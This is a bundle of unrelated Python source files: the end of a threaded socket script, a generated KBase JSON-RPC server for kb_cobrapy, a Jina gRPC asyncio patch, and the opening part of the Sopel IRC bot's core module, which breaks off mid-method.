socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
kb_cobrapyServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_cobrapy.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_cobrapy'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_cobrapy.kb_cobrapyImpl import kb_cobrapy # noqa @IgnorePep8
impl_kb_cobrapy = kb_cobrapy(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_cobrapy'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_cobrapy.model_to_sbml_file,
name='kb_cobrapy.model_to_sbml_file',
types=[dict])
self.method_authentication['kb_cobrapy.model_to_sbml_file'] = 'required' # noqa
self.rpc_service.add(impl_kb_cobrapy.export_model_as_sbml,
name='kb_cobrapy.export_model_as_sbml',
types=[dict])
self.method_authentication['kb_cobrapy.export_model_as_sbml'] = 'required' # noqa
self.rpc_service.add(impl_kb_cobrapy.status,
name='kb_cobrapy.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_cobrapy ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
grpc_asyncio.py
|
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
import asyncio
import functools
import inspect
import threading
from concurrent import futures
from grpc import _server
def _loop_mgr(loop: asyncio.AbstractEventLoop):
asyncio.set_event_loop(loop)
if not loop.is_running():
loop.run_forever()
# If we reach here, the loop was stopped.
# We should gather any remaining tasks and finish them.
pending = asyncio.all_tasks(loop)
if pending:
loop.run_until_complete(asyncio.gather(*pending))
if not loop.is_running():
loop.close()
class AsyncioExecutor(futures.Executor):
def __init__(self, *, loop=None):
super().__init__()
self._shutdown = False
try:
self._loop = loop or asyncio.get_event_loop()
except RuntimeError:
self._loop = asyncio.new_event_loop()
self._thread = threading.Thread(target=_loop_mgr, args=(self._loop,),
daemon=True)
self._thread.start()
def submit(self, fn, *args, **kwargs):
if self._shutdown:
raise RuntimeError('Cannot schedule new futures after shutdown')
if not self._loop.is_running():
raise RuntimeError('Loop must be started before any function can be submitted')
if inspect.iscoroutinefunction(fn):
coro = fn(*args, **kwargs)
return asyncio.run_coroutine_threadsafe(coro, self._loop)
else:
func = functools.partial(fn, *args, **kwargs)
return self._loop.run_in_executor(None, func)
def shutdown(self, wait=True):
if not self._loop.is_closed():
self._loop.close()
self._shutdown = True
if wait:
self._thread.join()
else:
self._thread.join(0)
async def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
context = _server._Context(rpc_event, state, request_deserializer)
try:
return await behavior(argument, context), True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = f'Exception calling application: {e}'
_server.logging.exception(details)
_server._abort(state, rpc_event.operation_call,
_server.cygrpc.StatusCode.unknown, _server._common.encode(details))
return None, False
async def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return await response_iterator.__anext__(), True
except StopAsyncIteration:
return None, True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = f'Exception iterating responses: {e}'
_server.logging.exception(details)
_server._abort(state, rpc_event.operation_call,
_server.cygrpc.StatusCode.unknown, _server._common.encode(details))
return None, False
async def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = await _call_behavior(rpc_event, state, behavior,
argument, request_deserializer)
if proceed:
serialized_response = _server._serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_server._status(rpc_event, state, serialized_response)
async def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
# Notice this calls the normal `_call_behavior` not the awaitable version.
response_iterator, proceed = _server._call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
while True:
response, proceed = await _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
if response is None:
_server._status(rpc_event, state, None)
break
else:
serialized_response = _server._serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
proceed = _server._send_response(rpc_event, state,
serialized_response)
if not proceed:
break
else:
break
else:
break
_server._unary_response_in_pool = _unary_response_in_pool
_server._stream_response_in_pool = _stream_response_in_pool
|
bot.py
|
# coding=utf-8
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
# Copyright 2019, Florian Strzelecki <florian.strzelecki@gmail.com>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import unicode_literals, absolute_import, print_function, division
from ast import literal_eval
import collections
from datetime import datetime
import itertools
import logging
import re
import sys
import threading
import time
from sopel import irc, logger, plugins, tools
from sopel.db import SopelDB
from sopel.tools import Identifier, deprecated
import sopel.tools.jobs
from sopel.trigger import Trigger
from sopel.module import NOLIMIT
import sopel.loader
__all__ = ['Sopel', 'SopelWrapper']
LOGGER = logging.getLogger(__name__)
if sys.version_info.major >= 3:
unicode = str
basestring = str
py3 = True
else:
py3 = False
class Sopel(irc.AbstractBot):
def __init__(self, config, daemon=False):
super(Sopel, self).__init__(config)
self._daemon = daemon # Used for iPython. TODO something saner here
self.wantsrestart = False
self._running_triggers = []
self._running_triggers_lock = threading.Lock()
# `re.compile('.*') is re.compile('.*')` because of caching, so we need
# to associate a list with each regex, since they are unexpectedly
# indistinct.
self._callables = {
'high': collections.defaultdict(list),
'medium': collections.defaultdict(list),
'low': collections.defaultdict(list)
}
self._plugins = {}
self.doc = {}
"""A dictionary of command names to their documentation.
Each command is mapped to its docstring and any available examples, if
declared in the plugin's code.
.. versionchanged:: 3.2
Use the first item in each callable's commands list as the key,
instead of the function name as declared in the source code.
"""
self._command_groups = collections.defaultdict(list)
"""A mapping of plugin names to lists of their commands."""
self._times = {}
"""
A dictionary mapping lowercased nicks to dictionaries which map
function names to the time which they were last used by that nick.
"""
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
For servers that do not support IRCv3, this will be an empty set.
"""
self.privileges = dict()
"""A dictionary of channels to their users and privilege levels.
The value associated with each channel is a dictionary of
:class:`sopel.tools.Identifier`\\s to a bitwise integer value,
determined by combining the appropriate constants from
:mod:`sopel.module`.
.. deprecated:: 6.2.0
Use :attr:`channels` instead. Will be removed in Sopel 8.
"""
self.channels = tools.SopelMemory() # name to chan obj
"""A map of the channels that Sopel is in.
The keys are :class:`sopel.tools.Identifier`\\s of the channel names,
and map to :class:`sopel.tools.target.Channel` objects which contain
the users in the channel and their permissions.
"""
self.users = tools.SopelMemory() # name to user obj
"""A map of the users that Sopel is aware of.
The keys are :class:`sopel.tools.Identifier`\\s of the nicknames, and
map to :class:`sopel.tools.target.User` instances. In order for Sopel
to be aware of a user, it must share at least one mutual channel.
"""
self.db = SopelDB(config)
"""The bot's database, as a :class:`sopel.db.SopelDB` instance."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
plugins. See :class:`sopel.tools.SopelMemory`.
"""
self.shutdown_methods = []
"""List of methods to call on shutdown."""
self.scheduler = sopel.tools.jobs.JobScheduler(self)
"""Job Scheduler. See :func:`sopel.module.interval`."""
@property
def command_groups(self):
"""A mapping of plugin names to lists of their commands."""
# This was supposed to be deprecated, but the built-in help plugin needs it
return self._command_groups
@property
def hostmask(self):
"""The current hostmask for the bot :class:`sopel.tools.target.User`.
:return: the bot's current hostmask
:rtype: str
Bot must be connected and in at least one channel.
"""
if not self.users or self.nick not in self.users:
raise KeyError("'hostmask' not available: bot must be connected and in at least one channel.")
return self.users.get(self.nick).hostmask
def setup(self):
"""Set up Sopel bot before it can run.
The setup phase is in charge of:
* setting up logging (configure Python's built-in :mod:`logging`)
* setting up the bot's plugins (load, setup, and register)
* starting the job scheduler
"""
self.setup_logging()
self.setup_plugins()
self.scheduler.start()
def setup_logging(self):
"""Set up logging based on config options."""
logger.setup_logging(self.settings)
base_level = self.settings.core.logging_level or 'INFO'
base_format = self.settings.core.logging_format
base_datefmt = self.settings.core.logging_datefmt
# configure channel logging if required by configuration
if self.settings.core.logging_channel:
channel_level = self.settings.core.logging_channel_level or base_level
channel_format = self.settings.core.logging_channel_format or base_format
channel_datefmt = self.settings.core.logging_channel_datefmt or base_datefmt
channel_params = {}
if channel_format:
channel_params['fmt'] = channel_format
if channel_datefmt:
channel_params['datefmt'] = channel_datefmt
formatter = logger.ChannelOutputFormatter(**channel_params)
handler = logger.IrcLoggingHandler(self, channel_level)
handler.setFormatter(formatter)
# set channel handler to `sopel` logger
LOGGER = logging.getLogger('sopel')
LOGGER.addHandler(handler)
def setup_plugins(self):
"""Load plugins into the bot."""
load_success = 0
load_error = 0
load_disabled = 0
LOGGER.info('Loading plugins...')
usable_plugins = plugins.get_usable_plugins(self.settings)
for name, info in usable_plugins.items():
plugin, is_enabled = info
if not is_enabled:
load_disabled = load_disabled + 1
continue
try:
plugin.load()
except Exception as e:
load_error = load_error + 1
LOGGER.exception('Error loading %s: %s', name, e)
else:
try:
if plugin.has_setup():
plugin.setup(self)
plugin.register(self)
except Exception as e:
load_error = load_error + 1
LOGGER.exception('Error in %s setup: %s', name, e)
else:
load_success = load_success + 1
LOGGER.info('Plugin loaded: %s', name)
total = sum([load_success, load_error, load_disabled])
if total and load_success:
LOGGER.info(
'Registered %d plugins, %d failed, %d disabled',
(load_success - 1),
load_error,
load_disabled)
else:
LOGGER.warning("Warning: Couldn't load any plugins")
def reload_plugin(self, name):
"""Reload a plugin.
:param str name: name of the plugin to reload
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
This function runs the plugin's shutdown routine and unregisters the
plugin from the bot. Then this function reloads the plugin, runs its
setup routines, and registers it again.
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
plugin = self._plugins[name]
# tear down
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info('Unloaded plugin %s', name)
# reload & setup
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info('Reloaded %s plugin %s from %s',
meta['type'], name, meta['source'])
def reload_plugins(self):
"""Reload all registered plugins.
First, this function runs all plugin shutdown routines and unregisters
all plugins. Then it reloads all plugins, runs their setup routines, and
registers them again.
"""
registered = list(self._plugins.items())
# tear down all plugins
for name, plugin in registered:
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info('Unloaded plugin %s', name)
# reload & setup all plugins
for name, plugin in registered:
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info('Reloaded %s plugin %s from %s',
meta['type'], name, meta['source'])
def add_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Add a loaded plugin to the bot's registry.
:param plugin: loaded plugin to add
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
self._plugins[plugin.name] = plugin
self.register(callables, jobs, shutdowns, urls)
def remove_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Remove a loaded plugin from the bot's registry.
:param plugin: loaded plugin to remove
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
name = plugin.name
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
# remove commands, jobs, and shutdown functions
for func in itertools.chain(callables, jobs, shutdowns):
self.unregister(func)
# remove URL callback handlers
if "url_callbacks" in self.memory:
for func in urls:
regexes = func.url_regex
for regex in regexes:
if func == self.memory['url_callbacks'].get(regex):
self.unregister_url_callback(regex, func)
LOGGER.debug('URL Callback unregistered: %r', regex)
# remove plugin from registry
del self._plugins[name]
def has_plugin(self, name):
"""Check if the bot has registered a plugin of the specified name.
:param str name: name of the plugin to check for
:return: whether the bot has a plugin named ``name`` registered
:rtype: bool
"""
return name in self._plugins
def get_plugin_meta(self, name):
"""Get info about a registered plugin by its name.
:param str name: name of the plugin about which to get info
:return: the plugin's metadata
(see :meth:`~.plugins.handlers.AbstractPluginHandler.get_meta_description`)
:rtype: :class:`dict`
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
return self._plugins[name].get_meta_description()
def unregister(self, obj):
"""Unregister a callable.
:param obj: the callable to unregister
:type obj: :term:`object`
"""
if not callable(obj):
LOGGER.warning('Cannot unregister obj %r: not a callable', obj)
return
callable_name = getattr(obj, "__name__", 'UNKNOWN')
if hasattr(obj, 'rule'): # commands and intents have it added
for rule in obj.rule:
callb_list = self._callables[obj.priority][rule]
if obj in callb_list:
callb_list.remove(obj)
LOGGER.debug(
'Rule callable "%s" unregistered for "%s"',
callable_name,
rule.pattern)
if hasattr(obj, 'interval'):
self.scheduler.remove_callable_job(obj)
LOGGER.debug('Job callable removed: %s', callable_name)
if callable_name == "shutdown" and obj in self.shutdown_methods:
self.shutdown_methods.remove(obj)
def register(self, callables, jobs, shutdowns, urls):
"""Register rules, jobs, shutdown methods, and URL callbacks.
:param callables: an iterable of callables to register
:type callables: :term:`iterable`
:param jobs: an iterable of functions to periodically invoke
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions to call on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions to call when matched against a URL
:type urls: :term:`iterable`
The ``callables`` argument contains a list of "callable objects", i.e.
objects for which :func:`callable` will return ``True``. They can be:
* a callable with rules (will match triggers with a regex pattern)
* a callable without rules (will match any triggers, such as events)
* a callable with commands
* a callable with nick commands
* a callable with action commands
It is possible to have a callable with rules, commands, and nick
commands configured. It should not be possible to have a callable with
commands or nick commands but without rules.
"""
# Append plugin's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods += shutdowns
match_any = re.compile('.*')
for callbl in callables:
callable_name = getattr(callbl, "__name__", 'UNKNOWN')
rules = getattr(callbl, 'rule', [])
commands = getattr(callbl, 'commands', [])
nick_commands = getattr(callbl, 'nickname_commands', [])
action_commands = getattr(callbl, 'action_commands', [])
events = getattr(callbl, 'event', [])
is_rule_only = rules and not commands and not nick_commands
if rules:
for rule in rules:
self._callables[callbl.priority][rule].append(callbl)
if is_rule_only:
# Command & Nick Command are logged later:
# here we log rule only callable
LOGGER.debug(
'Rule callable "%s" registered for "%s"',
callable_name,
rule.pattern)
if commands:
LOGGER.debug(
'Command callable "%s" registered for "%s"',
callable_name,
'|'.join(commands))
if nick_commands:
LOGGER.debug(
'Nick command callable "%s" registered for "%s"',
callable_name,
'|'.join(nick_commands))
if action_commands:
LOGGER.debug(
'Action command callable "%s" registered for "%s"',
callable_name,
'|'.join(action_commands))
if events:
LOGGER.debug(
'Event callable "%s" registered for "%s"',
callable_name,
'|'.join(events))
else:
self._callables[callbl.priority][match_any].append(callbl)
if events:
LOGGER.debug(
'Event callable "%s" registered '
'with "match any" rule for "%s"',
callable_name,
'|'.join(events))
else:
LOGGER.debug(
'Rule callable "%s" registered with "match any" rule',
callable_name)
if commands:
plugin_name = callbl.__module__.rsplit('.', 1)[-1]
# TODO doc and make decorator for this. Not sure if this is how
# it should work yet, so not making it public for 6.0.
category = getattr(callbl, 'category', plugin_name)
self._command_groups[category].append(commands[0])
for command, docs in callbl._docs.items():
self.doc[command] = docs
for func in jobs:
